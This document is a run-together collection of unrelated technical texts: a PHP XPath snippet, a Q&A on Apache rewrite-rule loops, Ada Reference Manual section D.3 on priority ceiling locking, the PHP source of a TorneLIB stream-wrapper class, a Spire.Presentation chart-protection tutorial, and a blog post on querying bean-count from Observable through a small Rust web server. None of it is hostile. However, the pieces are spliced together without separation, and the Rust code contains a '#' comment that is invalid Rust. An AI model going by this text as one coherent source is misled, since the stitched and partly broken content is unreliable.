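A side note on the XPath suggestion in the comments: in PHP 5 and later, the same kind of lookup can be done with the bundled DOM extension. A rough sketch against this article's test.xml (the query itself is just an example made up for illustration):

<?
    $doc = new DOMDocument();
    $doc->load('test.xml');
    $xpath = new DOMXPath($doc);

    // Titles of all photos that contain a <color/> element
    foreach ($xpath->query('/album/foto[color]/title') as $node) {
        echo $node->textContent, "\n";
    }
?>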
Q: I want to have all the URLs on my site handled by a single script, so I put in a rewrite rule like this:

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) /myscript.php?p=$1 [L]

But I don't want to allow access to my script on URLs that actually contain "myscript.php" in them, so I would like to redirect those back to the main site:

Redirect 301 /myscript.php http://example.com/

The problem is that if I put both of those rules into my .htaccess file, it causes an infinite loop. How do I get them both to work at the same time? I would also like to be able to redirect things like: /myscript.php?p=foo -> /foo

Answer (score 4): You can set an environment variable:

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !myscript\.php
RewriteRule (.*) /myscript.php?p=$1 [L,E=LOOP:1]

and test for that in your second rule:

RewriteCond %{ENV:REDIRECT_LOOP} !1
RewriteRule ^myscript\.php$ / [R,L]

Never test with 301 enabled; see "Tips for debugging .htaccess rewrite rules" for details.

Answer (score 1): Using an environment variable is perfectly OK; however, you don't need to set this environment variable manually yourself. Apache provides the REDIRECT_STATUS environment variable, which can be used for this purpose. REDIRECT_STATUS is empty (or not set) on the initial request. It is set to 200 on the first (successful) internal rewrite, or to some other HTTP status code in the case of an error (404 etc.). So, instead of checking that REDIRECT_LOOP is not 1, we can simply check that REDIRECT_STATUS is empty to ensure we are testing the initial request and not the rewritten request. For example:

RewriteCond %{ENV:REDIRECT_STATUS} ^$
RewriteRule ^myscript\.php$ / [R,L]

(Note that it is just REDIRECT_STATUS; there is no STATUS variable at the start of the request.)

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !myscript\.php
RewriteRule (.*) /test/myscript.php?p=$1 [L,E=LOOP:1]

Aside: the RewriteCond directive that checks against REQUEST_URI doesn't really do anything here. If the first condition is true (i.e. it's not a file), then this condition must also be true. However, the rule could be optimised by including this condition first, which would avoid the file check on every request (including the rewritten request). For example:

RewriteCond %{REQUEST_URI} !^/test/myscript\.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) /test/myscript.php?p=$1 [L]

Or, you could include a pre-check (an exception) before this rule instead, which halts processing when myscript.php is requested:

RewriteRule ^test/myscript\.php$ - [L]

However, if you do this, then the above canonical redirects must appear before these rules, otherwise they will never be processed. (Putting the canonical redirects first is generally preferable anyway.)
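Pulling the pieces together, and covering the asker's last point (sending /myscript.php?p=foo back to /foo), which neither answer addressed directly, a combined .htaccess might look like the sketch below. This is an assembly of my own, not from the thread; the QSD (query-string-discard) flag assumes Apache 2.4 or later:

# Direct requests for myscript.php with a p= parameter: redirect to the clean URL.
# %1 is captured from the preceding query-string condition; QSD drops the old query.
RewriteCond %{ENV:REDIRECT_STATUS} ^$
RewriteCond %{QUERY_STRING} ^p=(.+)$
RewriteRule ^myscript\.php$ /%1 [R,QSD,L]

# Direct requests without p=: back to the site root.
RewriteCond %{ENV:REDIRECT_STATUS} ^$
RewriteRule ^myscript\.php$ / [R,L]

# Everything that isn't a real file or directory goes to the script.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) /myscript.php?p=$1 [L]

# Switch R to R=301 only once the rules are verified; 301s are cached aggressively.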
D.3 Priority Ceiling Locking

1/3 [This subclause specifies the interactions between priority task scheduling and protected object ceilings. This interaction is based on the concept of the ceiling priority of a protected object.]

Syntax

2 The form of a pragma Locking_Policy is as follows:

3 pragma Locking_Policy(policy_identifier);

Legality Rules

4 The policy_identifier shall either be Ceiling_Locking or an implementation-defined identifier.

4.a implementation defined Implementation-defined policy_identifiers allowed in a pragma Locking_Policy.

Post-Compilation Rules

5 A Locking_Policy pragma is a configuration pragma.

Dynamic Semantics

6/2 {8652/0073} [A locking policy specifies the details of protected object locking. All protected objects have a priority. The locking policy specifies the meaning of the priority of a protected object, and the relationships between these priorities and task priorities. In addition, the policy specifies the state of a task when it executes a protected action, and how its active priority is affected by the locking.] The locking policy is specified by a Locking_Policy pragma. For implementation-defined locking policies, the meaning of the priority of a protected object is implementation defined. If no Locking_Policy pragma applies to any of the program units comprising a partition, the locking policy for that partition, as well as the meaning of the priority of a protected object, are implementation defined.

6.a/2 implementation defined The locking policy if no Locking_Policy pragma applies to any unit of a partition.

6.1/3 The expression specified for the Priority or Interrupt_Priority aspect (see D.1) is evaluated as part of the creation of the corresponding protected object and converted to the subtype System.Any_Priority or System.Interrupt_Priority, respectively. The value of the expression is the initial priority of the corresponding protected object. If no Priority or Interrupt_Priority aspect is specified for a protected object, the initial priority is specified by the locking policy.

7 There is one predefined locking policy, Ceiling_Locking; this policy is defined as follows:

8/3 • Every protected object has a ceiling priority, which is determined by either a Priority or Interrupt_Priority aspect as defined in D.1, or by assignment to the Priority attribute as described in D.5.2. The ceiling priority of a protected object (or ceiling, for short) is an upper bound on the active priority a task can have when it calls protected operations of that protected object.

9/2 • The initial ceiling priority of a protected object is equal to the initial priority for that object.

10/4 • If an Interrupt_Handler or Attach_Handler aspect (see C.3.1) is specified for a protected subprogram of a protected type that does not have either the Priority or Interrupt_Priority aspect specified, the initial priority of protected objects of that type is implementation defined, but in the range of the subtype System.Interrupt_Priority.

10.a implementation defined Default ceiling priorities.

11/3 • If neither aspect Priority nor Interrupt_Priority is specified for a protected type, and no protected subprogram of the type has aspect Interrupt_Handler or Attach_Handler specified, then the initial priority of the corresponding protected object is System.Priority'Last.

12 • While a task executes a protected action, it inherits the ceiling priority of the corresponding protected object.

13 • When a task calls a protected operation, a check is made that its active priority is not higher than the ceiling of the corresponding protected object; Program_Error is raised if this check fails.

13.1/5 If the task dispatching policy specified for the ceiling priority of a protected object is EDF_Within_Priorities, the following additional rules apply:

13.2/5 • Every protected object has a relative deadline, which is determined by a Relative_Deadline aspect as defined in D.2.6, or by assignment to the Relative_Deadline attribute as described in D.5.2. The relative deadline of a protected object represents a lower bound on the relative deadline a task may have when it calls a protected operation of that protected object.

13.3/5 • If aspect Relative_Deadline is not specified for a protected type then the initial relative deadline of the corresponding protected object is Ada.Real_Time.Time_Span_Zero.

13.4/5 • While a task executes a protected action on a protected object P, it inherits the relative deadline of P. In this case, let DF be 'now' ('now' is obtained via a call on Ada.Real_Time.Clock at the start of the action) plus the deadline floor of P. If the active deadline of the task is later than DF, its active deadline is reduced to DF[; the active deadline is unchanged otherwise].

13.5/5 • When a task calls a protected operation, a check is made that its active deadline minus its last release time is not less than the relative deadline of the corresponding protected object; Program_Error is raised if this check fails.

Bounded (Run-Time) Errors

13.6/5 Following any change of priority, it is a bounded error for the active priority of any task with a call queued on an entry of a protected object to be higher than the ceiling priority of the protected object. In this case one of the following applies:

13.7/5 • at any time prior to executing the entry body, Program_Error is raised in the calling task;

13.8/5 • when the entry is open, the entry body is executed at the ceiling priority of the protected object;

13.9/5 • when the entry is open, the entry body is executed at the ceiling priority of the protected object and then Program_Error is raised in the calling task; or

13.10/5 • when the entry is open, the entry body is executed at the ceiling priority of the protected object that was in effect when the entry call was queued.

13.a.1/2 ramification Note that the error is "blamed" on the task that did the entry call, not the task that changed the priority of the task or protected object. This seems to make sense for the case of changing the priority of a task blocked on a call, since if the Set_Priority had happened a little bit sooner, before the task queued a call, the entry-calling task would get the error. Similarly, there is no reason not to raise the priority of a task that is executing in an abortable_part, so long as its priority is lowered before it gets to the end and needs to cancel the call. The priority might need to be lowered to allow it to remove the call from the entry queue, in order to avoid violating the ceiling. This seems relatively harmless, since there is an error, and the task is about to start raising an exception anyway.

Implementation Permissions

14 The implementation is allowed to round all ceilings in a certain subrange of System.Priority or System.Interrupt_Priority up to the top of that subrange, uniformly.

14.a discussion For example, an implementation might use Priority'Last for all ceilings in Priority, and Interrupt_Priority'Last for all ceilings in Interrupt_Priority. This would be equivalent to having two ceiling priorities for protected objects, "nonpreemptible" and "noninterruptible", and is an allowed behavior.

14.b Note that the implementation cannot choose a subrange that crosses the boundary between normal and interrupt priorities.

15/5 Implementations are allowed to define other locking policies, but are not required to support specifying more than one locking policy per partition.

16 [Since implementations are allowed to place restrictions on code that runs at an interrupt-level active priority (see C.3.1 and D.2.1), the implementation may implement a language feature in terms of a protected object with an implementation-defined ceiling, but the ceiling shall be no less than Priority'Last.]

16.a implementation defined The ceiling of any protected object used internally by the implementation.

16.b proof This permission follows from the fact that the implementation can place restrictions on interrupt handlers and on any other code that runs at an interrupt-level active priority.

16.c The implementation might protect a storage pool with a protected object whose ceiling is Priority'Last, which would cause allocators to fail when evaluated at interrupt priority. Note that the ceiling of such an object has to be at least Priority'Last, since there is no permission for allocators to fail when evaluated at a noninterrupt priority.

Implementation Advice

17 The implementation should use names that end with "_Locking" for implementation-defined locking policies.

17.a/2 implementation advice Names that end with "_Locking" should be used for implementation-defined locking policies.

18 NOTE 1 While a task executes in a protected action, it can be preempted only by tasks whose active priorities are higher than the ceiling priority of the protected object.

19 NOTE 2 If a protected object has a ceiling priority in the range of Interrupt_Priority, certain interrupts are blocked while protected actions of that object execute. In the extreme, if the ceiling is Interrupt_Priority'Last, all blockable interrupts are blocked during that time.

20/5 NOTE 3 As described in C.3.1, whenever an interrupt is handled by one of the protected procedures of a protected object, a check is made that its ceiling priority is in the Interrupt_Priority range.

21/5 NOTE 4 When specifying the ceiling of a protected object, a correct value is one that is at least as high as the highest active priority at which tasks can be executing when they call protected operations of that object. In determining this value the following factors, which can affect active priority, are relevant: the effect of Set_Priority, nested protected operations, entry calls, task activation, and other implementation-defined factors.

22 NOTE 5 Attaching a protected procedure whose ceiling is below the interrupt hardware priority to an interrupt causes the execution of the program to be erroneous (see C.3.1).

23 NOTE 6 On a single processor implementation, the ceiling priority rules guarantee that there is no possibility of deadlock involving only protected subprograms (excluding the case where a protected operation calls another protected operation on the same protected object).

Extensions to Ada 95

23.a/2 All protected objects now have a priority, which is the value of the Priority attribute of D.5.2. How this value is interpreted depends on the locking policy; for instance, the ceiling priority is derived from this value when the locking policy is Ceiling_Locking.

Wording Changes from Ada 95

23.b/2 {8652/0073} Corrigendum: Corrected the wording to reflect that pragma Locking_Policy cannot be inside of a program unit.

23.c/2 Clarified that an implementation need support only one locking policy (of any kind, language-defined or otherwise) per partition.

23.d/2 The bounded error for the priority of a task being higher than the ceiling of an object it is currently in was moved here from D.5, so that it applies no matter how the situation arises.

Wording Changes from Ada 2005

23.e/3 Revised to use aspects Priority and Interrupt_Priority as pragmas Priority and Interrupt_Priority are now obsolescent.

Extensions to Ada 2012

23.f/5 All protected objects now have a relative deadline, which is the value of the Relative_Deadline attribute of D.5.2. How this value is interpreted depends on the locking policy.

Wording Changes from Ada 2012

23.g/4 Corrigendum: Clarified that the Priority aspect can be used to set the initial ceiling priority of a protected object that contains an interrupt handler.
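(Illustrative only; the example below is not part of the Reference Manual text.) A minimal sketch of how the Ceiling_Locking policy and a ceiling priority are typically specified. With the ceiling set to 15, a task whose active priority is higher than 15 gets Program_Error when it calls Increment (paragraph 13 above):

pragma Locking_Policy (Ceiling_Locking);  --  configuration pragma, partition-wide

package Counters is
   protected Shared_Counter
     with Priority => 15  --  ceiling priority (paragraphs 8/3 and 13)
   is
      procedure Increment;
      function Value return Natural;
   private
      Count : Natural := 0;
   end Shared_Counter;
end Counters;

package body Counters is
   protected body Shared_Counter is
      procedure Increment is
      begin
         Count := Count + 1;
      end Increment;

      function Value return Natural is
      begin
         return Count;
      end Value;
   end Shared_Counter;
end Counters;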
Source of file SimpleStreamWrapper.php
Size: 11,868 Bytes - Last Modified: 2020-10-25T23:00:04+00:00
/root/gitwork/work/tornelib-php-netcurl-6.1/src/Module/Network/Wrappers/SimpleStreamWrapper.php

<?php

/**
 * Copyright © Tomas Tornevall / Tornevall Networks. All rights reserved.
 * See LICENSE.md for license details.
 */

namespace TorneLIB\Module\Network\Wrappers;

use Exception;
use ReflectionException;
use TorneLIB\Exception\Constants;
use TorneLIB\Exception\ExceptionHandler;
use TorneLIB\Helpers\GenericParser;
use TorneLIB\Helpers\Version;
use TorneLIB\Model\Interfaces\WrapperInterface;
use TorneLIB\Model\Type\authSource;
use TorneLIB\Model\Type\authType;
use TorneLIB\Model\Type\dataType;
use TorneLIB\Model\Type\requestMethod;
use TorneLIB\Module\Config\WrapperConfig;
use TorneLIB\Utils\Generic;
use TorneLIB\Utils\Security;

try {
    Version::getRequiredVersion();
} catch (Exception $e) {
    die($e->getMessage());
}

/**
 * Class SimpleWrapper Fetching tool in the simplest form. Using file_get_contents.
 *
 * @package TorneLIB\Module\Network\Wrappers
 */
class SimpleStreamWrapper implements WrapperInterface
{
    // Note to self: Where are the static headers? Well, they are not here. For all streams
    // we use WrapperConfig to store header setups.

    /**
     * @var WrapperConfig $CONFIG
     * @since 6.1.0
     */
    private $CONFIG;

    /**
     * @var
     * @since 6.1.0
     */
    private $streamContentResponseRaw;

    /**
     * @var array
     */
    private $streamContentResponseHeader = [];

    /**
     * SimpleStreamWrapper constructor.
     * @throws ExceptionHandler
     */
    public function __construct()
    {
        // Base streamwrapper (file_get_contents, fopen, etc) is only allowed if allow_url_fopen is available.
        if (!Security::getIniSet('allow_url_fopen')) {
            throw new ExceptionHandler(
                sprintf(
                    'Wrapper class %s is not available on this platform since allow_url_fopen is disabled.',
                    __CLASS__
                ),
                Constants::LIB_METHOD_OR_LIBRARY_DISABLED
            );
        }

        $this->CONFIG = new WrapperConfig();
        $this->CONFIG->setStreamRequest(true);
        $this->CONFIG->setCurrentWrapper(__CLASS__);
    }

    /**
     * @since 6.1.2
     */
    public function __destruct()
    {
        $this->CONFIG->resetStreamData();
    }

    /**
     * @inheritDoc
     * @return string
     * @throws ExceptionHandler
     * @throws ReflectionException
     */
    public function getVersion()
    {
        return isset($this->version) && !empty($this->version) ?
            $this->version : (new Generic())->getVersionByAny(__DIR__, 3, WrapperConfig::class);
    }

    /**
     * @param WrapperConfig $config
     * @return SimpleStreamWrapper
     * @since 6.1.0
     */
    public function setConfig($config)
    {
        $this->CONFIG = $this->getInheritedConfig($config);

        return $this;
    }

    /**
     * @param $config
     * @return mixed
     * @since 6.1.0
     */
    private function getInheritedConfig($config)
    {
        $config->setCurrentWrapper($this->CONFIG->getCurrentWrapper());

        return $config;
    }

    /**
     * @return WrapperConfig
     * @since 6.1.0
     */
    public function getConfig()
    {
        return $this->CONFIG;
    }

    /**
     * @param $username
     * @param $password
     * @param int $authType
     * @return SimpleStreamWrapper
     * @since 6.1.0
     */
    public function setAuthentication($username, $password, $authType = authType::BASIC)
    {
        $this->CONFIG->setAuthentication($username, $password, $authType, authSource::STREAM);

        return $this;
    }

    /**
     * @return array
     * @since 6.1.0
     */
    public function getAuthentication()
    {
        return $this->CONFIG->getAuthentication();
    }

    /**
     * @inheritDoc
     */
    public function getBody()
    {
        return $this->streamContentResponseRaw;
    }

    /**
     * @inheritDoc
     * @throws ExceptionHandler
     */
    public function getParsed()
    {
        return GenericParser::getParsed(
            $this->getBody(),
            $this->getHeader('content-type')
        );
    }

    /**
     * @inheritDoc
     */
    public function getCode()
    {
        return $this->getHttpHead($this->getHeader('http'), 'code');
    }

    /**
     * @return int|string
     * @since 6.1.0
     */
    public function getHttpMessage()
    {
        return $this->getHttpHead($this->getHeader('http'), 'message');
    }

    /**
     * @param $string
     * @param string $returnData
     * @return int|string
     * @since 6.1.0
     */
    private function getHttpHead($string, $returnData = 'code')
    {
        return GenericParser::getHttpHead($string, $returnData);
    }

    /**
     * @param $key
     * @return string
     * @since 6.1.0
     */
    public function getHeader($key)
    {
        $return = '';

        if (isset($this->streamContentResponseHeader[0]) &&
            strtolower($key) === 'http' &&
            (bool)preg_match('/^http\//i', $this->streamContentResponseHeader[0])
        ) {
            return (string)$this->streamContentResponseHeader[0];
        }

        if (is_array($this->streamContentResponseHeader)) {
            foreach ($this->streamContentResponseHeader as $headerRow) {
                $rowExplode = explode(':', $headerRow, 2);
                if (isset($rowExplode[1]) && strtolower($key) === strtolower($rowExplode[0])) {
                    $return = (string)$rowExplode[1];
                }
            }
        }

        return $return;
    }

    /**
     * @param mixed $key
     * @param string $value
     * @param false $static
     * @return SimpleStreamWrapper|WrapperConfig
     * @since 6.1.2
     */
    public function setStreamHeader($key = '', $value = '', $static = false)
    {
        if (is_array($key) && empty($value)) {
            // Handle as bulk if this request (for example) comes from NetWrapper.
            foreach ($key as $getKey => $getValue) {
                $this->setStreamHeader($getKey, $getValue, false);
            }

            return $this;
        }

        return $this->CONFIG->setHeader($key, $value, $static);
    }

    /**
     * @param string $key
     * @param string $value
     * @param false $static
     * @return WrapperConfig
     * @since 6.1.2
     */
    public function setHeader($key = '', $value = '', $static = false)
    {
        return $this->setStreamHeader($key, $value, $static);
    }

    /**
     * @param $proxyAddress
     * @param null $proxyType
     * @return $this
     * @since 6.1.0
     */
    public function setProxy($proxyAddress, $proxyType = null)
    {
        $this->CONFIG->setCurrentWrapper(__CLASS__);
        $this->CONFIG->setProxy($proxyAddress, $proxyType);

        return $this;
    }

    /**
     * @throws ExceptionHandler
     * @since 6.1.0
     */
    public function getStreamRequest()
    {
        $this->CONFIG->getStreamOptions();
        $this->setStreamRequestMethod();
        $this->setStreamRequestData();

        // Make sure static headers are joined first.
        $this->CONFIG->getStreamHeader();

        // Finalize.
        $this->getStreamDataContents();

        return $this;
    }

    /**
     * @return $this
     * @since 6.1.0
     */
    private function setStreamRequestData()
    {
        $requestData = $this->CONFIG->getRequestData();

        $this->CONFIG->setDualStreamHttp(
            'content',
            $requestData
        );

        switch ($this->CONFIG->getRequestDataType()) {
            case dataType::XML:
                $this->setStreamContentType('text/xml');
                break;
            case dataType::JSON:
                $this->setStreamContentType('application/json; charset=utf-8');
                break;
            default:
                $this->setStreamContentType('application/x-www-form-urlencoded');
                break;
        }

        return $this;
    }

    /**
     * @param $contentType
     * @return $this
     */
    private function setStreamContentType($contentType)
    {
        $this->CONFIG->setDualStreamHttp(
            'header',
            sprintf(
                'Content-Type: %s',
                $contentType
            )
        );

        return $this;
    }

    /**
     * @return false|string
     * @throws ExceptionHandler
     * @since 6.1.0
     */
    public function getStreamDataContents()
    {
        // When requests are failing, this MAY throw warnings.
        // Usually we don't want this method to do this, on for example 404
        // errors, etc as we have our own exception handler below, which does
        // this in a correct way.
        $this->streamContentResponseRaw = @file_get_contents(
            $this->CONFIG->getRequestUrl(),
            false,
            $this->CONFIG->getStreamContext()
        );

        $this->streamContentResponseHeader = isset($http_response_header) ? $http_response_header : [];

        $httpExceptionMessage = $this->getHttpMessage();
        if (isset($php_errormsg) && !empty($php_errormsg)) {
            $httpExceptionMessage = $php_errormsg;
        }

        $this->CONFIG->getHttpException(
            $httpExceptionMessage,
            $this->getCode()
        );

        return $this;
    }

    /**
     * @return $this
     * @since 6.1.0
     */
    private function setStreamRequestMethod()
    {
        $requestMethod = $this->CONFIG->getRequestMethod();
        switch ($requestMethod) {
            case requestMethod::METHOD_POST:
                $this->CONFIG->setDualStreamHttp('method', 'POST');
                break;
            case requestMethod::METHOD_PUT:
                $this->CONFIG->setDualStreamHttp('method', 'PUT');
                break;
            case requestMethod::METHOD_DELETE:
                $this->CONFIG->setDualStreamHttp('method', 'DELETE');
                break;
            case requestMethod::METHOD_HEAD:
                $this->CONFIG->setDualStreamHttp('method', 'HEAD');
                break;
            case requestMethod::METHOD_REQUEST:
                $this->CONFIG->setDualStreamHttp('method', 'REQUEST');
                break;
            default:
                $this->CONFIG->setDualStreamHttp('method', 'GET');
                break;
        }

        return $this;
    }

    /**
     * @param $url
     * @param array $data
     * @param int $method
     * @param int $dataType
     * @return SimpleStreamWrapper
     * @throws ExceptionHandler
     * @since 6.1.0
     */
    public function request($url, $data = [], $method = requestMethod::METHOD_GET, $dataType = dataType::NORMAL)
    {
        $this->CONFIG->resetStreamData();
        if (!empty($url)) {
            $this->CONFIG->setRequestUrl($url);
        }
        if (is_array($data) && count($data)) {
            $this->CONFIG->setRequestData($data);
        }

        if ($this->CONFIG->getRequestMethod() !== $method) {
            $this->CONFIG->setRequestMethod($method);
        }

        if ($this->CONFIG->getRequestDataType() !== $dataType) {
            $this->CONFIG->setRequestDataType($dataType);
        }

        $this->getStreamRequest();

        return $this;
    }

    /**
     * @param $name
     * @param $arguments
     * @return mixed
     * @throws ExceptionHandler
     * @since 6.1.2
     */
    public function __call($name, $arguments)
    {
        $return = null;

        $compatibilityMethods = $this->CONFIG->getCompatibilityMethods();

        if (isset($compatibilityMethods[$name])) {
            $name = $compatibilityMethods[$name];
            $return = call_user_func_array([$this, $name], $arguments);
        }

        if (!is_null($return)) {
            return $return;
        }

        throw new ExceptionHandler(
            sprintf('Function "%s" not available.', $name),
            Constants::LIB_METHOD_OR_LIBRARY_UNAVAILABLE
        );
    }
}
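A minimal usage sketch, not part of the library source. The endpoint URL is made up, and it assumes the package's Composer autoloader is in place (the exact bootstrap is not shown in this file):

<?php

require __DIR__ . '/vendor/autoload.php';

use TorneLIB\Model\Type\dataType;
use TorneLIB\Model\Type\requestMethod;
use TorneLIB\Module\Network\Wrappers\SimpleStreamWrapper;

// POST a JSON body to a (hypothetical) endpoint and inspect the response.
$wrapper = new SimpleStreamWrapper();
$wrapper->request(
    'https://api.example.com/ping',
    ['hello' => 'world'],
    requestMethod::METHOD_POST,
    dataType::JSON
);

echo $wrapper->getCode(), "\n";   // HTTP status parsed from the stream response header
var_dump($wrapper->getParsed()); // body decoded according to the content-type header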
How to Protect Chart on PowerPoint Slide in C#, VB.NET When we create a PowerPoint slide that contains charts on it, we may not want others to change the chart data, especially when we create a presentation of financial report, it is very important for legal reasons that no changes get made when the slides are presented. In this article, I'll introduce how to protect chart on PowerPoint slide via Spire.Presentation in C# and VB.NET. Test File: How to Protect Chart on PowerPoint Slide in C#, VB.NET Code Snippet: Step 1: Create a new instance of Presentation class. Load the sample file to PPT document by calling LoadFromFile() method. Presentation ppt = new Presentation(); ppt.LoadFromFile("sample.pptx",FileFormat.Pptx2010); Step 2: Get the second shape from slide and convert it as IChart. The first shape in the sample file is a textbox. IChart chart = ppt.Slides[0].Shapes[1] as IChart; Step 3: Set the Boolean value of IChart.IsDataProtect as true. chart.IsDataProtect = true; Step 4: Save the file. ppt.SaveToFile("result.pptx", FileFormat.Pptx2010); Output: Run this program and open the result file, you’ll get following warning message if you try to modify the chart data in Excel. How to Protect Chart on PowerPoint Slide in C#, VB.NET Full Code: [C#] Presentation ppt = new Presentation(); ppt.LoadFromFile("sample.pptx",FileFormat.Pptx2010); IChart chart = ppt.Slides[0].Shapes[1] as IChart; chart.IsDataProtect = true; ppt.SaveToFile("result.pptx", FileFormat.Pptx2010); [VB.NET] Dim ppt As New Presentation() ppt.LoadFromFile("sample.pptx", FileFormat.Pptx2010) Dim chart As IChart = TryCast(ppt.Slides(0).Shapes(1), IChart) chart.IsDataProtect = True ppt.SaveToFile("result.pptx", FileFormat.Pptx2010)
__label__pos
0.722842
Observable + bean-count Observable + bean-count Two of my favorite tools lately are Observable (observablehq.com) (a long time favorite for quickly prototyping javascript and creating interactive visualizations) and bean-count (a more recent addition for doing "hobbyist double entry accounting" (a special form of "fun")). fava is a great open source web UI for bean-count that gives great default reports, and lets you submit custom queries.  However, part of the reason bean-count is so cool is that you have this super rich data that I want to experiment rendering in all kinds of ways, and also combine with other data like my predicted future spending etc. Naturally, I wanted to combine my two favorite tools. Localhost & CORS Fava has a nice "query" API endpoint, and I'm usually running Fava, so I was hoping I could just hit their endpoint.  The downside is that it returns its data in HTML format.  I thought about trying to parse the HTML to get the data out (a very reasonable, fixed amount of time), but decided I'd try to make a little web-server in Rust to serve my queries instead (a maybe less reasonable, more "fun" way). First I need a web server that I can query from Observable.  I started out with the exact example code from the warp docs: use warp::Filter; #[tokio::main] async fn main() { // GET /hello/warp => 200 OK with body "Hello, warp!" let hello = warp::path!("hello" / String) .map(|name| format!("Hello, {}!", name)); warp::serve(hello) .run(([127, 0, 0, 1], 3030)) .await; } I then added a block to my Observable notebook: (await fetch('http://localhost:3030/hello/there')).text() TypeError: Failed to fetch Oh no! It failed.  It's likely due to CORS, as detailed in the soFetch notebook, so I'll have to figure out how to allow cross-origin requests on my simple server. We can add some CORS handling like this: let cors = warp::cors() .allow_origin("https://pcarleton.static.observableusercontent.com") .allow_methods(vec!["GET"]); // GET /hello/warp => 200 OK with body "Hello, warp!" let hello = warp::path!("hello" / String) .map(|name| format!("Hello, {}!", name)) .with(cors); And voila! (await fetch('http://localhost:3030/hello/there')).text() "Hello, there!" Querying Now we just need to access bean query. To do that, I'll use a crate called duct which has some convenience functions for calling other commands: fn execute_query(query: &String) -> std::io::Result<String> { cmd!("bean-query", "-f", "csv", BEAN_PATH, query).read() } Then we just need to add some URI decoding so we can accept the query through the URL: fn wrap_execute(query: &String) -> String { let decoded = match urlencoding::decode(query) { Ok(s) => s, Err(_) => return String::from("error decoding query") }; match execute_query(&decoded) { Ok(s) => s, Err(e) => e.to_string() } } #[tokio::main] async fn main() { let cors = warp::cors() .allow_origin("https://pcarleton.static.observableusercontent.com") .allow_methods(vec!["GET"]); // GET /query/$QUERY_STRING let query = warp::path!("query" / String) # this is the new part .map(|q| wrap_execute(&q)) .with(cors); warp::serve(query) .run(([127, 0, 0, 1], 3030)) .await; } Then we do some encodeURI in our notebook and we're off to the races: query = `SELECT account, CONVERT(sum(position), 'USD') as position FROM date > 2020-01-01 AND date < 2022-01-01 group by account` (await fetch(`http://localhost:3030/query/${encodeURI(query)}`)).text() This still returns in CSV format, where I still want to add a JSON conversion layer. 
Other notes

I found this StackOverflow post about debugging CORS issues useful; the tl;dr is that if you set the Origin header, as in curl -H "Origin: myorigin.com", it should simulate a cross-origin situation. I also learned that I needed to use localhost and not 127.0.0.1 to query with fetch. I didn't dig too deeply into why that is.

If this was useful to you, let me know on Twitter!